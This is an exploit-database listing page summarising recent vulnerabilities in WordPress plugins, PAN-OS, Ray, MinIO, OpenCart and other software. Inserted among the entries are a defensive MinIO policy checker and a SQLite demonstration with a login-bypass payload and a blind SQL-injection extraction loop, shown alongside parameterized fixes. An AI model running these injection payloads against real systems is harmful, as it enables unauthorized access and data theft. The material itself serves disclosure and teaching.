Exploitdb Exploits

31,341 exploits tracked across all sources.

EIP-2026-113580 EXPLOITDB text
WordPress Plugin Background Image Cropper v1.2 - Remote Code Execution
by Milad karimi
CVE-2024-29291 EXPLOITDB text
Laravel Framework 8 through 11 - Info Disclosure
An issue in Laravel Framework 8 through 11 might allow a remote attacker to discover database credentials in storage/logs/laravel.log. NOTE: this is disputed by multiple third parties because the owner of a Laravel Framework installation can choose to have debugging logs, but needs to set the access control appropriately for the type of data that may be logged.
by Huseein Amer
EIP-2026-107143 EXPLOITDB text
FlatPress v1.3 - Remote Command Execution
by Ahmet Ümit BAYRAM
CVE-2024-3400 EXPLOITDB CRITICAL text
Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution
A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
by Kr0ff
CVSS 10.0
CVE-2024-34401 EXPLOITDB MEDIUM text
Savsoft Quiz 6.0 - XSS
Savsoft Quiz 6.0 allows stored XSS via the index.php/quiz/insert_quiz/ quiz_name parameter.
by Eren Sen
CVSS 6.1
CVE-2024-34987 EXPLOITDB CRITICAL text
Phpgurukul Online Fire Reporting System - SQL Injection
A SQL Injection vulnerability exists in the `ofrs/admin/index.php` script of PHPGurukul Online Fire Reporting System 1.2. The vulnerability allows attackers to bypass authentication and gain unauthorized access by injecting SQL commands into the username input field during the login process.
by Diyar Saadi
CVSS 9.1
CVE-2024-31804 EXPLOITDB MEDIUM text
Terratec DMX_6Fire USB 1.23.0.02 - Privilege Escalation
An unquoted service path vulnerability in Terratec DMX_6Fire USB v.1.23.0.02 allows a local attacker to escalate privileges via the Program.exe component.
by Joseph Kwabena Fiagbor
CVSS 6.7
CVE-2023-6019 EXPLOITDB CRITICAL text
Ray <2.8.1 - Command Injection
A command injection in Ray's cpu_profile URL parameter allows a remote, unauthenticated attacker to execute OS commands on the system running the Ray dashboard. The issue is fixed in version 2.8.1 and later. The Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
by Fire_Wolf
CVSS 9.8
EIP-2026-114247 EXPLOITDB text
WordPress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)
by Erdemstar
EIP-2026-113968 EXPLOITDB text
WordPress Plugin Playlist for Youtube 1.32 - Stored Cross-Site Scripting (XSS)
by Erdemstar
EIP-2026-113193 EXPLOITDB text
WBCE CMS Version 1.6.1 - Remote Command Execution (Authenticated)
by tmrswrr
EIP-2026-113188 EXPLOITDB text
WBCE 1.6.0 - Unauthenticated SQL injection
by young pope
EIP-2026-111405 EXPLOITDB text
PopojiCMS Version 2.0.1 - Remote Command Execution
by tmrswrr
EIP-2026-107670 EXPLOITDB text
HTMLy Version v2.9.6 - Stored XSS
by tmrswrr
CVE-2024-31777 EXPLOITDB CRITICAL text
openeclass <=3.15 - RCE
File Upload vulnerability in openeclass v.3.15 and before allows an attacker to execute arbitrary code via a crafted file to the certbadge.php endpoint.
by George Tsimpidas
CVSS 9.8
EIP-2026-103810 EXPLOITDB text
PrusaSlicer 2.6.1 - Arbitrary code execution
by Kamil Breński
CVE-2024-24747 EXPLOITDB HIGH text
MinIO - Privilege Escalation
MinIO is a high-performance object storage server. When someone creates an access key, it inherits the permissions of the parent key, not only for `s3:*` actions but also for `admin:*` actions. Unless `admin` rights are explicitly denied somewhere above in the access-key hierarchy, an access key can therefore use the admin API to rewrite its own `s3` permissions to something more permissive. The vulnerability is fixed in RELEASE.2024-01-31T20-20-33Z.
by Jenson Zhao
CVSS 8.8
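The MinIO entry above names two controls: an explicit deny on `admin:*` somewhere above the key in the hierarchy, and (after the fix) a child key that cannot exceed its parent. The Python below is an added example, not MinIO's own policy engine or code from the advisory author; it is a deliberately simplified IAM-style evaluator (deny wins, otherwise any matching allow, resources ignored) plus the two checks. The admin action names in ADMIN_ACTIONS and the sample policies are assumptions made for illustration.

```python
import fnmatch
import json

# Hypothetical admin actions to probe with; treat the names as assumptions.
ADMIN_ACTIONS = [
    "admin:CreateUser",
    "admin:AttachUserOrGroupPolicy",
    "admin:CreateServiceAccount",
]


def is_allowed(policy: dict, action: str) -> bool:
    """Simplified IAM-style evaluation: an explicit Deny on a matching
    statement always wins; otherwise the action needs at least one
    matching Allow. Resource and Condition blocks are ignored (assumption)."""
    allowed = False
    for st in policy.get("Statement", []):
        actions = st.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        if any(fnmatch.fnmatchcase(action, pat) for pat in actions):
            if st.get("Effect") == "Deny":
                return False
            allowed = True
    return allowed


def admin_reachable(policy: dict) -> list[str]:
    """Which admin actions a key governed by `policy` could still call."""
    return [a for a in ADMIN_ACTIONS if is_allowed(policy, a)]


def with_admin_denied(policy: dict) -> dict:
    """Mitigation named in the advisory: put an explicit Deny on admin:*
    above the keys so inheritance can never hand out admin rights."""
    hardened = json.loads(json.dumps(policy))      # deep copy
    hardened.setdefault("Statement", []).append(
        {"Effect": "Deny", "Action": ["admin:*"]}
    )
    return hardened


def can_derive(parent: dict, child: dict, actions: list[str]) -> bool:
    """Subset check at key-creation time: refuse a child policy that allows
    any action in `actions` that the parent does not allow."""
    return all(is_allowed(parent, a) or not is_allowed(child, a) for a in actions)


if __name__ == "__main__":
    # Constructed sample: a parent key with the blanket grant described above.
    parent = {"Statement": [{"Effect": "Allow", "Action": ["s3:*", "admin:*"]}]}
    print("admin reachable from parent:", admin_reachable(parent))
    print("after explicit deny:", admin_reachable(with_admin_denied(parent)))
```

Use `admin_reachable` against the policies attached to the keys that mint other keys; anything it returns is a path back to the admin API. The `can_derive` check is the shape of the post-fix behaviour, not its implementation.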
CVE-2025-34499 EXPLOITDB MEDIUM text
AnyDesk 7.0.15, 9.0.1 - Code Injection
AnyDesk 7.0.15 and 9.0.1 contain an unquoted service path vulnerability that allows local non-privileged users to execute code with SYSTEM privileges. An attacker who can write to a directory along the unquoted path plants an executable there, and the service control manager runs it in place of the intended binary.
by Milad karimi
EIP-2026-107677 EXPLOITDB text
Human Resource Management System v1.0 - Multiple SQLi
by nu11secur1ty
EIP-2026-106339 EXPLOITDB text
Daily Expense Manager 1.0 - 'term' SQLi
by Stefan Hesselman
EIP-2026-105454 EXPLOITDB text
Best Student Result Management System v1.0 - Multiple SQLi
by nu11secur1ty
CVE-2024-0353 EXPLOITDB HIGH text
ESET Endpoint Antivirus < 8.1.2062.0 - Improper Privilege Management
A local privilege escalation vulnerability potentially allowed an attacker to misuse ESET’s file operations to delete files without having the proper permission.
by Milad karimi
CVSS 7.8
EIP-2026-113554 EXPLOITDB text
WordPress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS)
by Erdemstar
EIP-2026-106115 EXPLOITDB text
Computer Laboratory Management System v1.0 - Multiple-SQLi
by nu11secur1ty
CVE-2024-58341 EXPLOITDB HIGH text
OpenCart Core 4.0.2.3 SQL Injection via search Parameter
OpenCart Core 4.0.2.3 contains a SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'search' parameter. Attackers can send GET requests to the product search endpoint with malicious 'search' values to extract sensitive database information using boolean-based blind or time-based blind SQL injection techniques.
by Saud Alenazi
CVSS 8.2
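The PHPGurukul entry above (authentication bypass through the username field) and this OpenCart entry (boolean-based blind extraction through the search parameter) are the two classic shapes of SQL injection. The Python below is an added example, not code from either project or from the exploit authors; it uses an in-memory SQLite database with a constructed schema to show a concatenated login query bypassed with `' OR '1'='1' -- `, a concatenated LIKE search turned into a true/false oracle that recovers a column character by character, and the parameterized versions of both. Table and column names are invented for the demonstration.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample schema; not taken from either application."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE admin(username TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin', 'S3cret!pass');
        CREATE TABLE product(name TEXT);
        INSERT INTO product VALUES ('fire hose'), ('extinguisher'), ('smoke alarm');
    """)
    return con


def login_vulnerable(con, username: str, password: str) -> bool:
    # Credentials concatenated straight into the statement (the bug class
    # described for the ofrs/admin/index.php login).
    sql = (f"SELECT COUNT(*) FROM admin WHERE username='{username}' "
           f"AND password='{password}'")
    return con.execute(sql).fetchone()[0] > 0


def login_fixed(con, username: str, password: str) -> bool:
    # Bound parameters: the input can never terminate the string literal.
    sql = "SELECT COUNT(*) FROM admin WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone()[0] > 0


def search_vulnerable(con, term: str) -> list[str]:
    sql = f"SELECT name FROM product WHERE name LIKE '%{term}%'"
    return [r[0] for r in con.execute(sql)]


def search_fixed(con, term: str) -> list[str]:
    sql = "SELECT name FROM product WHERE name LIKE ?"
    return [r[0] for r in con.execute(sql, (f"%{term}%",))]


def search_oracle(con):
    """Turn the vulnerable search into a boolean oracle. The injected
    condition is ANDed onto a match-all LIKE ('%%'), and the trailing
    '%'=' re-balances the quote the query appends, so rows come back
    exactly when the condition is true."""
    return lambda cond: len(search_vulnerable(con, f"%' AND {cond} AND '%'='")) > 0


def blind_extract(oracle, subquery: str, max_len: int = 32) -> str:
    """Boolean-based blind extraction of a single scalar, one printable
    ASCII character per position, stopping when no character matches."""
    out = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            cond = f"unicode(substr(({subquery}),{pos},1))={code}"
            if oracle(cond):
                out += chr(code)
                break
        else:
            return out                    # substr past the end: done
    return out


if __name__ == "__main__":
    con = build_db()
    bypass = "' OR '1'='1' -- "
    print("vulnerable login bypassed:", login_vulnerable(con, bypass, "x"))
    print("fixed login bypassed:", login_fixed(con, bypass, "x"))
    print("leaked:", blind_extract(search_oracle(con), "SELECT password FROM admin LIMIT 1"))
```

Two practical notes. A real blind attack would narrow each character by binary search on the code point rather than a linear scan, and a time-based variant swaps the boolean oracle for a measured delay; the extraction loop is otherwise the same. Parameter binding stops the injection but does not neutralize LIKE wildcards, so `%` and `_` in user input still need escaping if they must be matched literally.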